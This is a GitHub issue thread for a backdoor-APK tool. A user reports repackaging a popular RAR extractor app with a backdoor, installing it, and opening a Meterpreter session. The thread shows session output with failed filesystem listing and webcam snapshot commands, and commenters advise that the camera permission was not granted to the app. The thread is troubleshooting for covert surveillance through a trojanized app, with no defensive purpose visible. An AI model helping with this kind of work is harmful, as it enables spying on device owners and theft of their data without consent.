### ISSUE TITLE
doesn't have the required permission meterpreter

### ISSUE THREAD

**Issue by ghost** [dana-at-cp/backdoor-apk#196]
he,
after create backdoor for https://apkpure.com/fr/rar-extractor-manager/com.rarlab.rar
and upload rar backdoor 
> Meterpreter session 1 opened () at 2020-08-26 03:49:44 +0200
sessions 1
[*] Starting interaction with 1...
Listing: /data/user/0/com.rarlab.rar/files
==========================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40666/rw-rw-rw-  4096  dir   2020-08-26 03:49:46 +0200  oat

meterpreter > cd /
meterpreter > ls
[-] stdapi_fs_ls: Operation failed: 1
meterpreter > webcam_snap 1
[*] Starting...
[*] Stopped
[-] webcam_start: Operation failed: 1
meterpreter >

**Comment by AthenaGD** [comment]
maybe your phone's camera don't give the permission to the apk installed in your phone

**Comment by AthenaGD** [comment]
for your question 1: you need to check whether your phone's camera give the permission to the Apk file you installed in your phone or other system
